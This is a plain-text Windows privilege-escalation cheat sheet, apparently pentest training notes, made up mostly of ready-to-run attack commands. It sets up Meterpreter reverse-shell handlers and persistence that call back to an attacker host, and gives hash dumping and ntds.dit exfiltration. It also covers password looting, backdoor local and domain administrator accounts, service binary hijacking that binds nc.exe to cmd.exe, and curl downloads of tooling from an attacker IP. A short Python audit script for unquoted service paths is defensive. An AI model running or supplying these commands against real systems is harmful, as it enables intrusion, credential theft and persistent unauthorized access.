windows-privesc.txt
# credit: the amazing sirensecurity
# (with some reformatting and organization)
# https://sirensecurity.io/blog/windows-privilege-escalation-resources/
--------------------------------------------
TL;DR
--------------------------------------------
+ WHOAMI?
whoami
+ CAN I DO SPECIAL THINGS?
whoami /priv
+ SERVICES --> WHICH SERVICES START AT BOOT, AND WHICH SERVICE BINARIES TO CHECK WITH ICACLS.EXE
wmic service get name,startname
net start
+ NETWORK CAPABILITIES? (CHECK FOR SERVICES BOUND ONLY TO 127.0.0.1)
+ SHELL CAPABILITY --> STAGED/NON-STAGED? FORMAT? ARCH? ENCODER? BIND/REVERSE?
+ SHELL CAPABILITY --> ENSURE CODE EXEC.
+ NETWORK CAPABILITY.
netstat -anoy
+ NET USERS (LATERAL MOVEMENT CAPABILITIES?)
net users
net localgroup
net user <username> (am i admin? any special groups?)
+ ADMIN CAPABILITY?
net localgroup administrators
+ PERMITTED TRAFFIC CAPABILITY???
netsh advfirewall firewall show rule name=all
netsh advfirewall firewall show rule name=all dir=in
netsh advfirewall firewall show rule name=all dir=out
+ FILE TRANSFER CAPABILITY???
- certutil?
- FTP?
- TFTP?
- VB?
- PS?
- SMB?
- NFS?
+ ANY SCHEDULED TASKS I/O OPERATIONS?
C:\ > schtasks /query /fo LIST /v > schtasks.txt
+ BINPATHS?
sc.exe
+ Pro-tip - To prevent your shell from hanging as a result of any of these commands, prefix them with this!
cmd.exe /c <commands>
cmd.exe /c start <commands>
+ Pro-tip - Windows Powershell Execution Policy Bypass:
PowerShell.exe -ExecutionPolicy Unrestricted -File .\shell.ps1
+ I just got shell on windows! What would S1REN do?
--> Get a meterpreter shell.
When it comes to a windows machine and receiving a low privilege shell - I do not mess around. I will always immediately work to maintain access and gain a more useful shell with meterpreter.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacking Machine IP>
set LPORT <Listening Port>
--- Persistence with Meterpreter
+ Maintaining Access with Meterpreter:
https://www.offensive-security.com/metasploit-unleashed/maintaining-access/
meterpreter> run persistence -U -i 5 -p 443 -r <Attacking Machine IP>
[*] Creating a persistent agent: LHOST=<Attacking Machine IP> LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter>
meterpreter> reboot
Rebooting...
meterpreter> exit
meterpreter> sysinfo
Computer: XEN-XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter>
+ Forward out a vulnerable service with meterpreter.
meterpreter> portfwd add -l <Attacker PORT> -p <Victim PORT> -r <Victim IP>
meterpreter> portfwd add -l 3306 -p 3306 -r <Victim IP>
$ rdesktop 0.0.0.0
+ Dude just do this with your meterpreter shell - trust S1REN.
use exploit/windows/local/service_permissions
+ Migrate to a stable process.
--> "Using the migrate post module, you can migrate to another process on the victim."
meterpreter> run post/windows/manage/migrate
meterpreter> migrate -h
meterpreter> migrate <PID>
--- Payloads
- Check the target machine's architecture (x86, x64).
- Check whether the target needs a staged or a non-staged payload.
+ Execute a Powershell Script.
powershell.exe -File C:\Tools\privesc.ps1
--------------------------------------------
Basic enumeration checklist
--------------------------------------------
+ System Information
Save this output - other Windows privesc checking tools use it (they match on installed patches, OS version, etc.)
systeminfo
+ Who am I?
whoami
echo %username%
+ Privileges
whoami /priv
+ List out all NT AUTHORITY/SYSTEM Services.
wmic service get name,startname |FINDSTR "NT"
+ Print Nightmare?
whoami /priv
SeImpersonatePrivilege Enabled? 🙂
--- ActiveDirectory?
+ Domain Box?
Bloodhound? Sharphound?
+ Can we Install Things Elevated?
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
[Installing Elevated]
msiexec /i <path to msi file>
+ Could the path to privilege escalation be an executable binary or service under Program Files? Is it listening on localhost only, so that the outside scans missed it?
cd "C:\Program Files"
dir /a /o /q
cd "C:\Program Files (x86)"
dir /a /o /q
--- Users enumerations
+ What is my current user's privileges?
net user someWindowsUser
+ What are other user's privileges?
net users
+ Who's the Administrator(s) around here?
net localgroup administrators
+ Might we be able to move laterally to them if they are Administrators?
net user somePotentialAdminUser
--- Hash Collection:
pg_dump.exe
meterpreter > hashdump
ntds.dit exfiltration.
--- Firewall enumeration
+ Firewall Information?
netsh firewall show state
netsh firewall show config
--- Network Information
+ (Who am I connected to? Is anything bound only to loopback that could be forwarded out to 0.0.0.0?)
netstat -anoy
route print
arp -a
ipconfig /all
--- Looting credentials
+ Cleartext Passwords in Files? Search for them.
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
+ Find all those password and credential strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
+ Find all passwords in all files...
findstr /spin "password" *.*
--- Windows shares.
net share
net use
--> create a share on windows from the command line:
net share <SHARENAME>=<DRIVE:\FOLDERPATH> /REMARK:"This is my share."
--> MOUNT A WINDOWS SHARE FROM THE COMMAND LINE:
net use Z: \\computer_name\share_name /persistent:yes
--> UNMOUNT SHARE:
net use z: /delete
--> DELETE A SHARE ENTIRELY:
net share <SHARENAME> /delete
--- Finding weak file permissions
+ Find ALL weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
+ Same check for "Authenticated Users" - every real (non-guest) account is a member of that group, so you would be surprised what this turns up.
accesschk.exe -uwqs "Authenticated Users" c:\*.*
--- Adding Admin users / Domain admins
+ Add an Administrator User with all of the goodies.
cmd.exe /c net user siren superPassword /add
cmd.exe /c net localgroup administrators siren /add
cmd.exe /c net localgroup "Remote Desktop Users" siren /add
+ Adding a Windows Domain Administrator from the Command Line:
cmd.exe /c net user siren superPassword /add
net localgroup Administrators siren /ADD /DOMAIN
net localgroup "Remote Desktop Users" siren /ADD /DOMAIN
net group "Domain Admins" siren /ADD /DOMAIN
net group "Enterprise Admins" siren /ADD /DOMAIN
net group "Schema Admins" siren /ADD /DOMAIN
net group "Group Policy Creator Owners" siren /ADD /DOMAIN
--- Scheduled Tasks
+ Time and our own Scheduled Tasks.
time
The current time is: 6:41:05.81
at 06:42 /interactive "C:\Tools\sirenMaint.exe"
+ Create a Task. Run as System. Every 5 minutes. Path to binary.
schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn RUNME /tr "\"C:\Tools\sirenMaint.exe\""
Attacking Machine:
nc -lvp 443
Victim Machine:
schtasks /RUN /TN "RUNME"
+ Fun with Accesschk Enumeration!
accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
--- Folder permissions
+ Find ALL weak folder permissions, per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
--- Escalate from NT AUTHORITY\ NETWORK SERVICE
+ Let me guess, you came in as NT AUTHORITY\NETWORK SERVICE ?
MS09-012.exe "whoami"
Initiate Network-Related Transfer Again.
MS09-012.exe "ftp -v -n -s:ftp.txt" and come back in NT Shell.
--- Weak service path discovered?
+ I enumerated a weak service path on the machine. How do I exploit this... S1REN?
sc config UPNPHOST binpath= "C:\Tools\sirenMaint.exe"
sc config UPNPHOST obj= ".\LocalSystem" password= ""
sc config SSDPSRV binpath= "C:\inetpub\siren\sirenMaint.exe"
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= "demand"
(Now, Stage matching msfvenom Payload Listener in Meterpreter)
net stop SSDPSRV
net start SSDPSRV
+ Up to Vista...
psexec -i -s cmd.exe
+ On Windows XP and Older we can get an Administrator Privilege shell.
--> IF you have a GUI with a USER THAT IS INCLUDED IN THE Administrators GROUP you first
need to open up cmd.exe for the administrator. If you open up the cmd that is in
Accessories it will be opened up as a normal user. And if you rightclick and do
Run as Administrator you might need to know the Administrators password. Which
you might not know. So instead you open up the cmd from C:\windows\system32\cmd.exe.
This will give you a cmd with Administrators Rights.
--> From here, we want SYSTEM level privileges, no?
--> First we check what time it is on the local machine.
time
--> Now we set the time we want the system CMD to start.
--> Probably one minute after the current time.
at 01:23 /interactive cmd.exe
System Shell.
--- Unquoted Service paths
+ Ahh, so you're interested in UNQUOTED SERVICE PATHS... eh?
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
--> Using SC:
sc query
sc qc <service name>
--> Okay S1REN, what am I looking for here?
If the BINARY_PATH_NAME value returned by the command above is not wrapped in quotes and contains spaces - it's vulnerable.
--> Have a hit?
--> Use icacls or cacls.exe (both native to Windows) to check binary permissions.
icacls "C:\Program Files (x86)\UNQUOTED_SERVICE_PATH_SOFTWARE"
--> Exploit it.
--> If the path of the Binary file is:
C:\Program Files\something\something.exe
--> Then,
move something.exe something.exe.BACK
move sirenMaint.exe "C:\Program Files\something\"
move sirenMaint.exe something.exe
--> Well, wasn't that fun? Now our payload will get executed instead of the intended exe!
--> Nice.
#S1REN, is there a better way to enumerate out every service and then just check for which of them has an Unquoted Bin Paths?
--> Yup.
--> Thanks S1REN!
cd "C:\Windows\TEMP"
sc query state= all | findstr "SERVICE_NAME:" >> ServiceNames.txt
FOR /F %i in (ServiceNames.txt) DO echo %i
type ServiceNames.txt
FOR /F "tokens=2 delims= " %i in (ServiceNames.txt) DO @echo %i >> Services.txt
FOR /F %i in (Services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
type path.txt
Nice.
--> S1REN.
--> Yes?
--> Is there a way to do essentially the same thing and then recursively execute icacls.exe or cacls.exe on them to get the information I need?
--> Yup.
cd "C:\Windows\TEMP\"
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> C:\windows\temp\permissions.txt
###
icacls.exe:
for /f eol^=^"^ delims^=^" %a in (C:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
cacls.exe
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c cacls "%a"
IF YOU FIND A SERVICE THAT HAS WRITE PERMISSIONS set to "EVERYONE", you can change
that binary INTO YOUR OWN CUSTOM BINARY and make it execute in the privileged context.
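As an added audit example (not from these notes or from S1REN's page), a small Python script that applies the rule above to constructed `sc qc` output: for each unquoted service path it lists the executables Windows would try before the intended binary, i.e. the directories a defender must confirm are not writable by normal users, and it produces the quoted binPath= value that fixes the service. It also covers the "better way to enumerate" loops further down; the service names and paths are invented.

```python
import re

# Constructed sample of `sc qc <service>` output for three made-up services.
SAMPLE_SC_QC_OUTPUT = """\
SERVICE_NAME: GoodSvc
        BINARY_PATH_NAME   : "C:\\Program Files\\Vendor App\\service.exe" -run
SERVICE_NAME: BadSvc
        BINARY_PATH_NAME   : C:\\Program Files\\Vendor App\\bin\\service.exe -k
SERVICE_NAME: SysSvc
        BINARY_PATH_NAME   : C:\\Windows\\system32\\svchost.exe -k netsvcs
"""

def parse_sc_qc(text):
    """Map service name -> BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.*\S)", line)
        if m and current:
            services[current] = m.group(1)
    return services

def search_candidates(path):
    """Executables CreateProcess tries before the real one when the path is unquoted
    and has spaces; quoted paths and paths without spaces yield an empty list."""
    if path.startswith('"') or " " not in path:
        return []
    tokens, candidates = path.split(" "), []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the intended binary; the remaining tokens are arguments
        candidates.append(prefix + ".exe")
    return candidates

def quoted_binpath(path):
    """Remediation value: the executable quoted, arguments kept (for sc config binPath=)."""
    tokens = path.split(" ")
    for i, tok in enumerate(tokens, 1):
        if tok.lower().endswith(".exe"):
            exe, args = " ".join(tokens[:i]), " ".join(tokens[i:])
            return f'"{exe}"' + (f" {args}" if args else "")
    return path

def audit(text):
    """Service name -> hijackable candidate paths, for unquoted service paths only."""
    return {n: c for n, p in parse_sc_qc(text).items() if (c := search_candidates(p))}
```

Paths under C:\Windows\ are still reported if unquoted; filter them the same way the wmic one-liner above does if you only want third-party services.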
--- Scheduled tasks with SYSTEM privileges
+ Dealing with Scheduled Tasks with SYSTEM Privileges.
--> Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
schtasks /query /fo LIST /v > schtask.txt
type schtask.txt
(Copy that output to a temporary file)
--> Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user. In other words, copy the output into Kali and just grep for SYSTEM.
--> Nice, S1REN.
--> Thanks.
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM --color=auto
--> Now, Change up the UPNP Service Binary Path (for example):
sc config upnphost binpath= "C:\Tools\nc.exe -nlvp 6666 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
net stop <service>
--> Attacking Machine
nc -nlvp 6666
net start <service>
--- Tools
(Remember how I said to save a local copy of that systeminfo output?)
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
--- Cross-Compilation
+ How do I cross-compile payloads for Windows on Linux, S1REN?
--> Dude, check this out.
apt-get install mingw-w64
Cross-compilation Reference:
- C, 32-bit:   i686-w64-mingw32-gcc hello.c -o hello32.exe
- C, 64-bit:   x86_64-w64-mingw32-gcc hello.c -o hello64.exe
- C++, 32-bit: i686-w64-mingw32-g++ hello.cc -o hello32.exe
- C++, 64-bit: x86_64-w64-mingw32-g++ hello.cc -o hello64.exe
--------------
More notes, other sources ; emf
Windows pentest list:
- Got user? -> Evil-WinRm (Gets you remote session as user)
Windows post-exploitation checklist
1. Enumerate user
whoami
2. Enumerate user privileges
whoami /priv
net user [username]
3. List running processes
tasklist
Increasing foothold
- Download powerview.ps1
(serve with simplehttp)
curl http://$attackerIp:$port/powerview.ps1 -o ./powerview.ps1
- Group policy vertical privesc
-> Try to get group policy for vertical escalation, see what your user can do
-> Get default ID of default domain policy
Get-GPO "Default Domain Policy"
-> See what your user could do with this policy permission
Get-GPPermission -Guid [policyId] -TargetType User -TargetName [yourUser]
-> (Look for Permission section: Can you Edit/Modify?)
-> Add the policy to your user
---
Tools
- EvilWinRM Windows remote shell / management tool
- SharpGPOAbuse Abuse user edit rights on an AD group policy object to compromise objects it is attached to
- psexec.py Multipurpose tool, used for lateral movement in Windows network.
Can run commands as other users using hashes, get IP configurations of remote systems,
--- Resources
- https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
- https://www.fuzzysecurity.com/tutorials/16.html
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
+ Domains.xml Abuse.
https://github.com/FSecureLABS/SharpGPOAbuse